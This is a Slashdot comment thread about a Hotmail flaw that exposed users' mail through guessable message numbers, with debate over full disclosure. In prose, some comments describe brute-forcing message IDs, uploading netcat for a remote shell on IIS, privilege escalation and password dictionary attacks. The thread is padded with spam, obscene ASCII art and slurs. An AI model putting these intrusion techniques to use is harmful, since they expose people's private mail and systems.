For script kiddies who don't want to be bothered with the detailes, there's even a Windows program that automates the process.

Re:Step-by-step hacking tutorial

[Anomymous+Coward]

There's actually now two win32 binaries that demonstrate the exploit. The first requires you to log into hotmail to set the cookie, the second allows you to do that from the program's GUI.

Re:Step-by-step hacking tutorial

Important Stuff:

Please try to keep posts on topic.

Try to reply to other people comments instead of starting new threads. Read other people's messages before posting your own to avoid simply duplicating what has already been said. Use a clear subject that describes what your message is about. Offtopic, Inflammatory, Inappropriate, Illegal, or Offensive comments might be moderated. (You can read everything, even moderated posts, by adjusting your threshold on the User Preferences Page)

Problems regarding accounts or comment posting should be sent to CowboyNeal.

For more informaiton

Re:Step-by-step hacking tutorial

Important Stuff:

Please try to keep posts on topic.

Try to reply to other people comments instead of starting new threads. Read other people's messages before posting your own to avoid simply duplicating what has already been said. Use a clear subject that describes what your message is about. Offtopic, Inflammatory, Inappropriate, Illegal, or Offensive comments might be moderated. (You can read everything, even moderated posts, by adjusting your threshold on the User Preferences Page)

Problems regarding accounts or comment posting should be sent to CowboyNeal.

For more informaiton

We've tracked the intruder!

[sgt_getraer]

"In addition, intruders would first need to log in to their own Hotmail accounts, which means they'd leave a clear trail for investigators to follow, experts said."

Ah yes, that clear trail to a dead end makes me feel much more secure...

hot males!

220000th slut!

take that!

previous incident....

[jeffy124]

The previous case from 2 years ago Taco speaks of can be found here

oh ya baby!

2200000th post! you know you want it!

Big Surprise - More info...

[tre]

blah blah, we expect this from MS... blah blah, when will they get their act together...

This was already posted to BugTraq not too long ago. For a more technical breakdown of the details surrounding the Hotmail vulnerability, go here:

http://www.securityfocus.com/archive/1/205785

PLEASE!

[plemeljr]

* Will someone please think of the children! *

yo yo yo

2200000th post!

read it and weep.

Re:yo yo yo

STUPID

YOU

ARE

Invalid form key: ru1VqvJlny !

If you this error seems to be incorrect, please provide the following in your report to Source Forge:

* Browser type
* User ID/Nickname or AC
* What steps caused this error
* Whether or not you know your ISP to be using a proxy or some sort of service that gives you an IP that others are using simultaneously.
* How many posts to this form you successfully submitted during the day

* Please choose 'formkeys' for the category!
Thank you.

Microsoft's response...

[ddstreet]

...is priceless:

"However," Microsoft said, "we recognize the concerns raised in the computational infeasibility of this mechanism and are investigating ways that we can raise this bar even higher."

Like Taco said...you just can't make this stuff up. That response is just too funny.

Re:Microsoft's response...

[Balinares]

That's it. We can quit MS bashing, people. They do a better job of it on their own anyway. ;)

Re:Microsoft's response...

[Camel+Pilot]

computational infeasibility

Yes, but any script kid knows

Perl: Easy Things Easy -- Hard Things Possible.

Re:Microsoft's response...

I don't get it... I even read the article and I still don't get it. From what I gather, are they saying they're not going to fix the hole, but just make it even harder to guess at or something?

Re:Microsoft's response...

[grammar+fascist]

Not to squash your witty reply or anything - but all cryptography relies on computational infeasibility. Let's say that Microsoft added a truly random 128-bit key to your email number. That would certainly raise the bar high enough, don't you think?

Re:Microsoft's response...

[kinnunen]

That is just outrageus! And I know for a fact that there is another hole in hotmail that involves guessing. In the front page you can type in anyone's username and try to guess the password. And they won't do anything about that either! Those guys at MS are ASSHOLES!

We are talking about a brute force attack here. Every password and all encryption (except OTP) can be broken with a brute force approach. But if the brute force attack takes 500 million years to find the correct password/key/whatever, who cares.

Re:Microsoft's response...

[11223]

Why not just check your cookie to make certain you're logged in as that account.

Whoops, this is MS we're talking about. Sory for that burst of sanity.

Re:Microsoft's response...

[goodtim]

They have a bar?

Re:Microsoft's response...

Let's say that Microsoft added a truly random 128-bit key to your email number. That would certainly raise the bar high enough, don't you think?

Passwords shouldn't be sent in plain text over the internet, especially not in a GET request. So no, the bar wouldn't be high enough, but it would be about as high as any other webmail provider.

Re:Microsoft's response...

[daviddennis]

For more just like this, check out this priceless classic:

A Bug by Any Other Name by James Gleick

My favourite part:

Microsoft has brought spin "to a high art in the software industry," says Peter Deegan, editor of Woody's Office Watch, an online newsletter for Microsoft users. "The MSN email debacle reminded me immediately of the story of how the old U.S.S.R. is supposed to have announced the Chernobyl nuclear accident to the world media." Ah, Peter, if only. Continuing to respond to users' desire for clean, inexpensive power, the Soviet Union has accelerated an upgrade of its historic Chernobyl plant . . .

D

Re:Microsoft's response...

[kinnunen]

And then a hacker can try to guess the cookie value.

You can build a fancy authentification system using 2048 bit RSA an whatnot, but even that can be broken by guessing. You just need to make sure there are so many possibilities that no one ever guesses right. Use cookies or use CGI-parameters, it really doesn't matter.

Re:Microsoft's response...

[Balinares]

Indeed! But I fear that is not the point.
The problem isn't that their hashing algorithm is weak. The problem is that the stored emails are freaking world readable.
As for you, why do they toss in those nice shiny tech words? Could it be to divert our attention from the real problem, ie, the design of their system is downright braindead? :)

foo

bar

muahahahhah

220000th post is all mine!

universal variables

[Traicovn]

The more parts of a program you have refferencing any single variable in programming C/C++, the more chance for a margin of error you have

Security works the same way. The more places you use a key, or the more people you give a copy of your key to, the higher risk you have for errors, being hacked, identiy theft, being robbed, etc. A 'single sign-on' like the MSN/Hotmail passport or AOL's new Single-Signon or Screenname (not sure what they are calling it) that all AIM accounts/AOL accounts now have become are just another invitation of risk.

Users need to be alerted of this fact, that these systems may not be secure, and users need to understand that the more people who they use their single sign-on for, the higher the risk becomes.

In this situation though, you have to wonder. If the person issuing the 'keys', microsoft in this case, does not do a good job of protecting them and making sure that their security is up to date, can it be any better than if you had a safe deposit box that sat unlocked in the middle of Times Square?

I can't wait to see what happens when in addition to all these Single Sign-on and Passport type programs, that we have Digital Signatures too. That should be interesting.

follow up to the Grimace death post

.,cdSSSSSSSbec.
,eSSSSSSSSSSSSSSSSSbc
,eSSP"" "3SSSS"" "??Sc
.dS" .SSSS "?c
eSSF .,ceSSSSSSSSSSecc,. Sb.
.dSSSSSSP""""""?SSSSSSP????SSe..SSb.
.SSSSSSF,="""""""^SSSS"====,,`"SSSSSS.
.SSSSSSS eSSSSSSSS SSSP.eSSbe."=`SSSSSS
zSSSSSSSS<SSF "SSS.SSS SP"`?SSSe.SSSSSSb zSSb. ..
dSSSSSSSSSc"Sb__zSP'dSSSb" .SSSF,SSSSSSSc .SSSSS.SSSc
dSSSSSSSSSSSSe,`"`,eSSSSSSSc,,`",,eSSSSSSSSS .SSSe,?SSSSFSSSS b.
.SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSb 4SSSSSc"SSSSSSSS%SS.
.SSSSSSSSSP"eSSSSSSSSSS?????SSSSSSSSSSPSSSSSSSS. 4SSSSSSedSSSSSSSSSSP
dSSSSSSSEzebd""????"" `"?SSSSSSF"?SSSSSSS. SSSSSSSSSSSSSSSSSS%
zSSSSSSSSSSSSSSe. `""" .zee3SSSSSSS `SSSSSSSSSSSSSSSSSr
SSSSSSSSSSSSSSSSSSc. ;:;:,,;;;; zSSSSSSSSSSSSSb JSSSSSSSSSSSSSSSSF
SSSSSSSSSSSSSSSSSSSSSbc,""''"",cceSSSSSSSSSSSSSS SSSc SSSSSSSSSSSSSSSSS
SSSSSSSSSSSSSSSSSP"??SSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSc .,SSSSSSSSSSSSSSSS"
SSSSSSSSSSSSSSP".dSSb`SSSSSSSSSSSSSSSSSSSSSSSSSS SSSSS.?SSSSSSSSSSSSSSSS"
SSSSSSSSSP???"zSSSSSP.SSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSS.SSSSSSSSSSSSSS?L
SSSSSSSS'dSb,SSSSSF'zSSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSb SSSSSSSSSSSSbS%
SSSSSSS'SSSdSSSSS,,??SSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSSe"SSSSSSSSSSSS"
SSSSSS'SSSSSSSSSSSSSc"SSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSSSc"SSSSSSSSSP"
SSSSS'JSSSSSSSSSSSSSS>SSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSSSSc3SSSS SSP"

Re:follow up to the Grimace death post

You've done it now, you fucker. McDonalds are going to come down on Trademark infringement like you won't believe...

Re:follow up to the Grimace death post

good, maybe i'll countersue and get a free ShitMac out of it.

oh yes!

what number is this?

2200000th?

oh yes i think so!

220000th post~

two hundred and twenty thousandth post! what wehat what!

Re:220000th post~

j0ur m0d p0int is 0wned

i got the post!

i got 220000th post. you don't. haha.

Finding a specific message not easy

Finding a valid message number is of course total guesswork, but they do all follow a consistent format and always have the same number of digits (i.e., a time stamp), so with the help of a little brute-force program one could (if one was into these things) try numerous combinations in the background rather than type them in.

So the hacking danger here is very much limited by the need to guess message numbers, which is slow going. And while there is a handy program for bruting the numbers it's quite slow, trying only about one message page per second in 'fast' mode.

Theres a little story about it on the msn.co.uk website

Re:Finding a specific message not easy

[uigrad_2000]

So the hacking danger here is very much limited by the need to guess message numbers, which is slow going. And while there is a handy program for bruting the numbers it's quite slow, trying only about one message page per second in 'fast' mode.


No guessing or brute force machine is necessary if you're on a public PC. Walk into your library, and go through the history of IE. You can easily find the message numbers, because they're in the URL's.

Re:Finding a specific message not easy

That's a fundamental flaw in Hotmail, personally I use Netscape Webmail as it doesn't have the security problem that MS-Hotmail has. Please ditch hotmail for anything other than spam and get your mates to do the same.

Re:Finding a specific message not easy

[Lussarn]

So the hacking danger here is very much limited by the need to guess message numbers, which is slow going. And while there is a handy program for bruting the numbers it's quite slow, trying only about one message page per second in 'fast' mode.

First of, multithreading the app comes to mind.

But the real issue is that it is possible to get someone elses data without logging in as that person or even have the password. Thats flawed.

Whetever or not you practicaly can get the data is not really that important. Security thrugh obscurity doesn't cut it any more when MS has decided to play with the big boys.

Re:Finding a specific message not easy

[AdamInParadise]

The parent message is just a rip-off of the article on The Register.

Re:Finding a specific message not easy

no, the parent post is just an attept to get a goatse.cs message up to +2

Re:Finding a specific message not easy

divinnt be silly man

Re:Finding a specific message not easy

I've heard that this hotmail problem is very similar to a huge gaping hole in the arse

Re:Finding a specific message not easy

[linuxci]

That MSN story you linked to is very informative, probably the best description of Hotmail I've ever seen :)

i have a bad feeling about this

2200000

Re:i have a bad feeling about this

2200000.01

Re:previous incident

it's in the Hall of Fame!

220000th

don't take your eyes off the prize!

220000th is mine!

Well...

[Ford+Fulkerson]

someone emails me and says "I think my boyfriend/girlfriend is cheating on me and I really need to know the backdoor into hotmail to find out".

...did s/he?

Re:Well...

[jbrw]

I'd be more worried that the person was clear sure if their friend was a boy or a girl.

...j

Hacked.... yeah right

[Pu22L3R]

I think microsoft makes the holes themselves, does any other "large" organization have this much trouble? I am willing to bet you can't get into Bill Gate's house without some sort of "rent-a-cop" cause there may be a security hole there too...

what number???

could it be? really? truely?

2200000th!!!!

hurrah!

220000th?

awww ya baby! come on!

Security hole?

[Saint+Aardvark]

Now I can finally write a LISP program to pick up my hotmail...I'm never leaving Emacs again!

again?

[josepha48]

Wern't they hacked a little while ago? Something about passwords or usernames or something?

I'm glad I stopped using them years ago, when M$ took over. I kinda new that their service was going down.

Lets see, they were hacked once, then the red worm did a little damage, now they are hacked again... hmm can't wait for .net, so that everyone can read my design documents. hmm do you think they 'll have local or remote storage with .net???

It's to bad that they are such a hackers target and they do little in the way of security. I wonder how strong the M$ firewall will be in XP..

I know it may seem a bit trollish, and would be suprised if someone did not ask quesitons, but then again there are those that follow blindly.. Are you a sheep or a wolf?

2200000th Alyson Hannigan post

so many Alysons.. so little time

more grits please!

Dear Rob

[Shoeboy]

I feel compelled to say something about pots, kettles and African-American's here. Slashdot has had and continues to have numerous holes.

I'll skip over the 2 times that you were hacked and focus on a pair of luckless users:
AxelBoldt and Randal Schwartz.

Both these users had their accounts stolen by a brilliant and handsome young foot-fetishist due to flaws in slashcode. Axelboldt used "AxelBoldt" as his password, and was then embarassed to find several passionate screeds about Heidi Wall posted under his name. Poor Randal Schwartz posted even more embarassing material, but that's what he gets for using a password of "slashdot".

Anyway Rob, I'm not criticizing, I just think that before you go casting stones at hotmail, you should at least enforce some password standards on slashdot and develop a method of detecting and blocking the dictionary attacks I've been running.

Your friend,
--Shoeboy

Re:Dear Rob

Here's the bug report CmdrMalda DOESN'T WANT YOU TO SEE.

Re:Dear Rob

[Rod+Malda]

I'm afraed I have my hands a bit full right now. Despite the time we spent testin slash on banjo, we didn't find any bugs. Acutally, I'm startig to think it might be a good idea to learn a bit about how real programmers test code. Since amazon and other sites with more complex code bases seem to ba able to updatre their code without breaking everything, I guess they must have some method of ensuring that their code actually workds. Anyway, I'm sure if you spend the next two years bugging me a bout this, I'll be happy to ignore you, or complain that users are never satisfied. Plus your idea won't scale. But thanks for the input --Rod "Cmbr. Taco" Malda

Re:Dear Rob

[crayz]

That time Randal Schwartz's account was hacked remains one of the funniest things I've ever read. That post, and the others, were works of art.

Re:Now if they could only figure out google's cach

[HP+LoveJet]

I think it's only for Google's tracking purposes. If you eliminate the alphanumeric code and one of the colons on either side--leaving only

http://www.google.com/search?q=cache:www.foo .com/c ached.url

--it still works fine.

you know!

220000th!

who's the man?

oh ya! it's me!

'Found it' ?

[q-soe]

Im so glad they found this flaw (one which from the reading isnt all that new) as now we know that our hotmail can be read by anyone - how ? well the kind hearted uber skilled hackers didn't just post this to MS did they ? naaah they posted ot everywhere - its the talk of IRC etc etc.

Im so glad hackers keep 'finding' things, like credit card numbers, ways into banking systems, viruses like code red - makes me feel warm and fuzzy.

My question - not to be a troll - is this (and this does not just relate to MS products but im asking a serious question)

if this security flaw had not been found (by these guys looking for a way to break into hotmail to read peoples mail) would anyone have been affected ? i mean if the flaw had to be looked for with carefull thought etc then was it a real serious issue BEFORE these guys told everyone ?

networks can have flaws and holes, open ports etc left active by a careless admin - not the best i know but big systems have a lot of work and these days we are coping with less staff (i know my company is) so sometimes things slip through.

But these guys go and look for the exploit (i mean what other reason would you have to search for this exploit BUT to be able to hack in and read mail? and then why tell everyone?

These things need to be fixed i agree but if no one wold know they were there expect for some kindly souls seeking them out then how much of an issue are they ? Are we just accepting that hackers are a good thing cause they find these problems ? what will you think when they 'fin' that flaw in the company which has your credit card number ?

Re:'Found it' ?

[DNS-and-BIND]

If you don't tell anyone, the flaw is still there. Only, if you don't tell anyone about the flaw, only the bad guys know about it. The piece below written in 1853 by Charles Tomlinson, and is only an excerpt of the the treatise, but it shows that people recognized that 'security' through thwarting the exchange of knowledge of flaws was not really security at all, waaaay before the digital age.

Rudimentary Treatise on the Construction of Locks

A commercial, and in some respects a social, doubt has been started within the last year or two, whether or not it is right to discuss so openly the security or insecurity of locks. Many well-meaning persons suppose that the discussion respecting the means for baffling the supposed safety of locks offers a premium for dishonesty, by showing others how to be dishonest. This is a fallacy. Rogues are very keen in their profession, and already know much more than we can teach them respecting their several kinds of roguery. Rogues knew a good deal about lockpicking long before locksmiths discussed it among themselves, as they have lately done. If a lock -- let it have been made in whatever country, or by whatever maker -- is not so inviolable as it has hitherto been deemed to be, surely it is in the interest of honest persons to know this fact, because the dishonest are tolerably certain to be the first to apply the knowledge practically; and the spread of knowledge is necessary to give fair play to those who might suffer by ignorance. It cannot be too earnestly urged, that an acquintance with real facts will, in the end, be better for all parties.

Some time ago, when the reading public was alarmed at being told how London milk is adulterated, timid persons deprecated the exposure, on the plea that it would give instructions in the art of adulterating milk; a vain fear -- milkmen knew all about it before, whether they practiced it or not; and the exposure only taught purchasers the necessity of a little scrutiny and caution, leaving them to obey this necessity or not, as they pleased.

...The unscrupulous have the command of much of this kind of knowledge without our aid; and there is moral and commercial justice in placing on their guard those who might possibly suffer therefrom. We employ these stray expressions concerning adulteration, debasement, roguery, and so forth, simply as a mode of illustrating a principle -- the advantage of publicity. In respect to lock-making, there can scarcely be such a thing as dishonesty of intention: the inventor produces a lock which he honestly thinks will posess such and such qualities; and he declares his belief to the world. If others differ from him in opinion concerning those qualities, it is open to them to say so; and the discussion, truthfully conducted, must lead to public advantage: the discussion stimulates curiosity, and curiosity stimulates invention. Nothing but a partial and limited view of the question could lead to the opinion that harm can result: if there be harm, it will be much more than counterbalanced by good.

Re:'Found it' ?

[q-soe]

yes i agree - of course - but Tomlinson (and i would say that you could find something related to a more modern era to back your point up) was not telling everyone in the world - his point is that the information may be used for bad and thats a good point - but talking about how to fix a lock and posting exploit code on every available place is hardly covered by this point - sure the flaw would be there - but unless someone went looking with malicious intent (and these guys were doing that trust me) then it would not pose a problem - i make no point as to whether this is right or wrong only that for these guys to claim they are 'helping' hotmail by telling them is invalidated by their telling everyone else as well - sort of like a guy yelling fire whilst hes holding a match.

BTW tomlinson's treatise is very interseting and he was using it to say that just beacuse information may be used for wrong does not mean it should not be covered under freedom of speech, and thats a good poin, However from what i have read freedom of speech does not cover criminal actions and incitment to commit a criminal act - the knowing distribution of information designed to facilitate or encourage an act contrary to the law.

Thats what these guys are doing - they set out to compromise a commercial system belonging to a private company with the aim of exploiting that system for their gain (fame, notoriety etc etc) - this is a crime no matter what they claim. They then spread the information in a way designed to allow people to gain access that system thus allowing them to cmmit the same crime - in effect making them accomplices.

My point is these guys are not worthy of the attention and support they get. Thats my opinion anyway.

But thanks for a great reply post - very well done and ineresting. and made me think - you may be right, i may be wrong , but thats what this place is all about

Re:'Found it' ?

[gol64738]

if this security flaw had not been found (by these guys looking for a way to break into hotmail to read peoples mail) would anyone have been affected ? i mean if the flaw had to be looked for with carefull thought etc then was it a real serious issue BEFORE these guys told everyone ?

wow holy crap, dude, you should apply to work with microsoft. you have the perfect frame of mind!
security thru obscurity isn't warm and fuzzy. it's an accident waiting to happen.

Re:'Found it' ?

[DNS-and-BIND]

Well, it's like this...vendors do not fix things. Software can be horribly broken, and nothing will be done even though the vendor is fully aware of the problem. Vendors simply refuse to release the fix, because it will incur additional costs. Publically releasing the flaw and exploit methodology virtually ensures a timely fix. Otherwise, nothing would ever be fixed. Deal with support from a real provider for a year or two and it will all become clear.

Re:'Found it' ?

[q-soe]

I agree with that - i deal with vendors everyday - especially MS (im an MIS manager in an MS environment) but if you think they afe bad try SAP vendors - these guys make the CIA look friendly and easy to deal with.

But you are correct vendors dont fix code and i agree its an issue and we should be telling them about flaws - but these guys told much more than them - if they had only told MS and bugtraq that would be fine, yet in this topic we have full details on the exploit and everyone on IRC and my ICQ contact know about it - it's all over the web, thus they are not just telling the vendors, or bugtraq or CERT but they are telling everyone how to hack a system - this makes them 'black hats' in my eyes (i hate that term !).

All this sort of news does is bring publicity and cause the vendor to circle the wagons and deny everything - and they start another discussion on evil hackers (watch the TV - newsflash Hackers can read your mail) and obfuscate the fact that ALL systems have vulnerabilities - we all need to be aware of that. (not thats my opinion only)

Another damn good point - i enjoy your posts man !

Re:'Found it' ?

Interesting. Links in sigs aren't subject to the same "[host]" code as normal links in comments.

Re:'Found it' ?

[Secret+Coward]

Thats what these guys are doing - they set out to compromise a commercial system belonging to a private company with the aim of exploiting that system for their gain (fame, notoriety etc etc) - this is a crime no matter what they claim. They then spread the information in a way designed to allow people to gain access that system thus allowing them to cmmit the same crime - in effect making them accomplices.

First of all, who are 'these guys'? The guys that found the exploit and the guys that posted it to Slashdot are not necessarily the same; but let's just assume that they are.

From their actions, this is what I see:

Some guys hate Microsoft, and thus want to make Microsoft look bad. These guys also worry that Microsoft's Passport system will create a pandora's box of privacy violations and security holes. These issues have been popularily discussed, but few people care until an actual exploit has been discovered.

The guys seek out an example to illustrate the problems with their arch-enemy's plans. They discover a security hole, and promptly inform Microsoft (to look good) and Bugtraq. Keeping the news inside Microsoft and on Bugtraq does not serve their agenda.

The guys then post details for the rest of the world; not to gain notoriety or fame, but rather to educate the public about a serious fundamental problem in Microsoft's proposed Passport system.

The guys have no intention of compromising the system. They do not want to read a bunch of get-rich-quick scams. They do not want other people to compromise the system. Instead, they want other people to see how simple this exploit is. Hopefully, when people see the simplicity of this exploit, the message will hit home. These guys have an agenda to spread truthful information about an issue which deeply concerns them. This is protected speech.

I have personally read about many, many security exploits in the news. In most cases, I simply assume that only a security expert could actually apply the exploit. Having read directions on how this exploit works, I now know that Hotmail is not only insecure, but so insecure that my next door neighbor could break in.

One final thing, black hats do not tell the world about security exploits. They keep the exploit a secret and use it for their own selfish motives. By telling the world, the vendor fixes the exploit, thus making it worthless for criminal activity. Except for the vendor, this is in everyone's best interest.

No Kidding...

[Greyfox]

I was all set to flame about this story being a year old. Oops. It's a different one. Sorry. My bad.

when?

where?

i smoked all you fewls!

220000th, you can't front on that!

fuck you 220000th post posers, i win!

you cna't mess with me!

my 220000th posting skills are to leet for all ya'lls.

Crackers?

[thufir]

I use to love crackers! They are a great little snack in between meals: good with cheese or jam, and not too filling.

And now they betray me, reading my personal email? Damn them!

Hackers on the other hand, I keep an eye on. Some can be good, and some can be bad (or both).

First Heidi Wall post

oops... sorry..

RMS

Richard Stallman says: 220000th post!

"Limited Scope"

[CMiYC]

Why does the media try to convince people that a "fast internet connection" is a limiting factor? It seems to me that many of the people who are script kiddies, or l33 d00z, or whatever, are people have some form of broadband. That's like saying "well cars are only dangerous if you drive a Porsche."

Re:"Limited Scope"

[Goonie]

Because the difference between broadband and dialup connections are *considerably* greater than the differences between a "normal car" and a Porsche, particularly under typical road conditions.

In terms of relative damage one can do, a better analogy might be comparing the damage potential of a kid on a bicycle compared to an 18-wheeler.

Re:"Limited Scope"

Good point about the broadband, but that's not where they get their bandwidth. Surely none of these kids actually attack from their home network.

I expect they get serious bandwidth by compromising other systems. So you can attack with way more than mere broadband, and you can do it from a web cafe. Right??

Re:"Limited Scope"

[gotan]

It's even possible, that they launch this attack not from their home account (which would be dumb anyway, ... ok they would), but from some server they have access to (maybe by having hacked it before), with a broadband connection. Just because the attacker is connected to the internet via an 56k modem doesn't mean the attack is launched via that line.

But let's not get that in the way of Microsofts denying the relevance of this attack.

dumbass

If you've ever read the story or even tested code red you would know that IIS runs as a guest account with limited permissions. So you upload nc.exe and start a telnet session on some port. You can't grab the contents of the sam file or install any more backdoors.

Re:dumbass

If you'd ever cracked IIS on NT you'd know any reasonable skript kid uses the same, five (six?) year old ring-0 exploit as 'getadmin' to get around this limitation.

Less than 1/2 string readable

ABSOLUTELY NO READABLE CONTENT on this topic. Nothing, nada, just 2200000 assholes tring to get 2200000 posts written in 2 minutes.

Slashdot, your feet stink!

Approaching...

post number #2200000!

testing.

testin g slash2.2

So what?

[HillBilly]

Someone gets to read my spam. Maybe they will have better luck making their dick 4 inches longer than I did.

Leads right into Passport.

[Pinball+Wizard]

Don't forget, with your hotmail account, you automatically have a Microsoft Passport created for you!

With Passport, a single sign on can access all your credit cards, bank accounts, medical history, and other pertinent data! And who better than Microsoft to trust all your personal data to? You'll never again have to worry about who has your personal information because you have the power of Microsoft to secure it and manage it for you.

Re:Leads right into Passport.

[yomegaman]

The way I read it, this doesn't compromise your Passport account in any way. It's a flaw in the way Hotmail authenticates requests.

Re:Leads right into Passport.

not true at all, cracking hotmail msg doesnt give you the account password

formkwys

i got formkey 2200000 swinging right here bitch.

security holes

the goatsex man knows all about holes.

220000th by the way....

Who wants some COCK

_ 8_ . _ . _ . _ . _ 8\_ . _\
_ .8_ . _ . _ . _ . _8 \_ . _\
_ .8_ . _ . _ . _ . 8_ .\_ . _\
_ .8_ . _ . _ . _ . 8_ . \_ . _\ __
_ 8_ . _ . _ . _ . _ 8_ . \_ . ./__|oooo88888v___
_8_ . _ . _ . _ . _ .8888888**** \/_ . _ . _ |_ .\
_8_ . _ . _ . _ . _ .8_ . _ . _ . _ . _ . _ . \_ .\
8_ . _ . _ . _ . _ . 8_ . _ . _ . _ . _ . _ . |___/
8_ . _ . _ . _ . _ . 8_ . _ . /AvAvAvA\ooo8888A
8_ . _ . _ . _ . _ . 8_ . 8888I I I I I
8_ . _ . _ . _ . _ . 8_ .8_ . \_A_A_A_/
_8_ . _ . _ . _ . _ 8_ . _8
_8_ . _ . _ . _ . _ 8_ . _8
_ 8_ . _ . _ . _ . 88_ . _8
_ .8_ . _ . _ . _ .8 8_ .8
_ . 8_ . _ . _ . _ 8_ 888
_ . _8_ . _ . _ . _8
_ . _ 8 . _ . _ . _8
_ . _ 8_ . _ . _ . 8
_ . _ 8_ . _ . _ . 8
_ . _ 8_ . _ . _ . 8
_ . _ 8_ . _ . _ . 8
_ . _ 8_ . _ . _ . 8

thank you

The 220000th post is gonna be released under the GPL! huzzah!

This is

post #2200000!

bah

[2MuchC0ffeeMan]

bah, it works... but you have to scan millions of numbers to get one message... very efficent, i must say.

Bad, but getting better.

[Godeke]

I will probably take a huge beating for saying this, but here it is. Although Microsoft has a long way to go in dealing with security issues, they are lightyears ahead of where they were only a few months ago. New tools to scan all the servers in the domain for patch levels of various vulnerabilities, fairly quick response time to notifications of vulnerabilities and no more "that's only a theoretical vulnerability" attitude.

I am subscribed to their security notifications and there is an honest effort on their part to fix the problems. More shocking is the recognition they are giving to groups that expose these vulnerabilities - a 180 turn around how they used to desparage those who uncovered such problems.

Re:Bad, but getting better.

[willfe]

It's indeed a good sign they finally give a nod to those who find holes in their products, but are they actually doing anything to foster those efforts? Is Microsoft standing up against the DMCA which technically makes even looking for these kinds of holes illegal? Are they offering rewards for the holes people find? Are they opening up their source to people who've proven they know their stuff and could likely help them find and close more holes?

Until they start actually doing something to encourage folks with more than a quick nod, it doesn't really improve their image much :)

Informative - More like criminal action actually

I don't mean to be a stick in the mud but this information clearly lays out how to hack into a privately owned computer system. This is illegal in most countries and as such whilst Slashdot don't censor their posters (free speech is something i'm all for) allowing this to be moderated up shows the sort of people that this site is being controlled by - and a smart lawyer could argue that the promotion of this item constitues the marketing and or distribution of this illegal material thus making slashdot and its owners accesories after the fact to a crime (yes hacking is a criminal offence with jail terms)

Just a point - now if you guys have a brain you will mod this back down or remove it - i think its an interstin post but i would encourage the users NOT to post full exploits but a link to a page (use geotcities or someone similar) off site - as you cannot be held responsible for it (pretty disclaimers aside you are legally responsible for the content here - its just that no one has decided to pursue it yet)

YES I AM A LAWYER

all hail!

all hail 2200000th has arrived!

Oh crap!

[fobbman]

Thanks to Hotmail there are going to be a number of people out there now using my name to get valuable college degrees over the `net.

Hopefully they'll be good sports and also get me a lower interest rate on my home.

elvis

i saw 2200000th post at burger king, he was getting a large fries.

obvious, in many ways

[Bob+Arctor+is+dead]

Of course all those numbers you see in the URL determines what your browser will show. That those are, in theory, guessable does not imply they need to be in practice. RSA is breakable in theory too. And indeed, Root Core say explicitly:

• You just have to guess them..one by one. Yes, it could mean scanning thousands/millions of messages just to see something. (slow it is)

Don't get me wrong, I'm all for Microsoft bashing, but I wouldn't call this a "major security hole". It's a hole alright, but major? Not by my standards.

One day...

[MasterOfDisaster]

One day, people will STOP TRUSTING MICROSOFT WITH ANYTHING!$$@#@
I'm sorry...but, when MS isnt selling all your info to someone, they let the hackers have it...
has MS sued the finders of this backdoor yet?

hail alyson!

alyson hannigan is going to be post number 2200000.

You can kiss her grits!

I am

post #2200000!

TRUTH

please moderate down this accurate, on-topic, truthful comment. thx.

my first troll

[characterZer0]

i'll try one time. one time only for whatever big number people are going for. i won't try it again, i swear. (bye bye karma)

Re:my first troll

MOTHER FUCK PUSS BUCKET!

You son of a bitch...

Re:my first troll

beginners luck. 2300000th will be mine sucka!

Re:my first troll

Congradulations on 2200000...now then

"All your 2200000 are belong to us"

Re:my first troll

Someone PLEASE for the love of god mod this guy up.

Watching the real trolls run for miles for this one, then to see an accidental get.

Fuck I wish I had moderator points today.

Re:my first troll

[SpanishInquisition]

Notice that the new system generate even more crap than the old system? Now not only people want to have first post, but they'll also go for the post with lots of zeros after it. Good job Slashdot crew, you've just started a new trend,
"Zero Posting", the rules are simple, the most 0s you have, the most l33t you are. I even envision a new trend "Prime Posting", where you look for prime numbers in you comment id. Anyway, your site is doomed.

Re:my first troll

[kahuna720]

Congrats, it would appear that you have won!
A singular achievement indeed, apparently being chased by several folks here.

As a ranking member of the FP community, however, I am saddened by the new numbering system. It appears that many will move on to contests involving milestone comment numbers (such as you have accomplished with comment, um, "2200000"), but somehow it doesn't quite have the feel of first posting. Less like racing, more like Lotto.

However, I do not wish my comments to detract from your win, as I wish to offer you congratulations of the type once shared between all the great FPers back in its heyday. WTG, and, emphatically, w00t.

Re:my first troll

actually, its not so much like lotto, its more like trying to be caller number 9 to win the concert tickets.

Re:my first troll

Well done, definately deserving +5. I thought that I wouldn't post again until the crappy retaliatory moderator dumb fucks went away and died in someone's rectum, but for such an achievement, I'll make an exception.

This is it!

Heil Hitler! Post 464268712226

Re:This is it!

mother FUCK! If it wasn't for that fucking lameness filter I would of had 2200001

Slashdot requires you to wait 2 minutes between each successful posting of a comment to allow everyone a fair chance at posting a comment.

It's been 1 minute since you last successfully posted a comment

If you this error seems to be incorrect, please provide the following in your report to Source Forge:

Browser type
User ID/Nickname or AC
What steps caused this error
Whether or not you know your ISP to be using a proxy or some sort of service that gives you an IP that others are using simultaneously.
How many posts to this form you successfully submitted during the day* Please choose 'formkeys' for the category!
Thank you

Re:This is it!

I meant 2200000. In my excitement (or excretement) I made a typo.

free

Free beer!

free speech!

free slkyarov!

free kevin!

free 2200000th post!

Re:free

Free Alyson Hannigan...

and her grits!

2200000th

did I win?

2200000 penes.

I claim this post for all men, everywhere.

_ 8_ . _ . _ . _ . _ 8\_ . _\
_ .8_ . _ . _ . _ . _8 \_ . _\
_ .8_ . _ . _ . _ . 8_ .\_ . _\
_ .8_ . _ . _ . _ . 8_ . \_ . _\ __
_ 8_ . _ . _ . _ . _ 8_ . \_ . ./__|oooo88888v___
_8_ . _ . _ . _ . _ .8888888**** \/_ . _ . _ |_ .\
_8_ . _ . _ . _ . _ .8_ . _ . _ . _ . _ . _ . \_ .\
8_ . _ . _ . _ . _ . 8_ . _ . _ . _ . _ . _ . |___/
8_ . _ . _ . _ . _ . 8_ . _ . /AvAvAvA\ooo8888A
8_ . _ . _ . _ . _ . 8_ . 8888I I I I I
8_ . _ . _ . _ . _ . 8_ .8_ . \_A_A_A_/
